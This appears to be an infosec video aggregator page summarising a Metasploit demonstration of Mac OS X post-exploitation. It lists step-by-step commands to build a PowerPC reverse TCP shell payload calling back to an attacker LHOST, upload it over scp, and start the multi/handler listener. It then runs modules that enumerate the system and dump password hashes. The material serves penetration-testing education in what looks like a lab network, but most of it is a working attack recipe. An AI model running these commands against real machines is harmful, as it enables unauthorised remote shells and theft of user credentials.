Description: As always, Carlos Perez aka Dark Operator, member of the PaulDotCom crew and Metasploit developer, is inspired. A new set of post exploitation scripts have been developed and integrated in the Metasploit framework repository. These scripts permit you to gather interesting information's on a Mac OS X target.
Docs : http://eromang.zataz.com/2011/02/23/metasploit-mac-os-x-post-exploitation-enumeration-and-hash-dump/
Scenario :
1) Create a "test" executable for the targeted Mac OS X, here 10.5 PPC, with msfpayload.
sudo msfpayload osx/ppc/shell_reverse_tcp LHOST=192.168.178.21 LPORT=4444 X -o test
2) Upload this executable to the targeted Mac OS X, here with ssh
scp test ericromang@192.168.178.24:/Users/ericromÂang/
3) In msfconsole
use exploit/multi/handler
set PAYLOAD osx/ppc/shell_reverse_tcp
set LHOST 192.168.178.21
exploit -j
4) Post exploitation 1 : With unprivileged user
./test on Mac OS X
In msfconsole
use post/osx/gather/enum_osx
set SESSION 1
run
5) Post exploitation 2 : With privileged user
sudo ./test on Mac OS X
In msfconsole
use post/osx/gather/hashdump
set SESSION 1
run
Tags: metasploit , mac os x , apple , hack ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.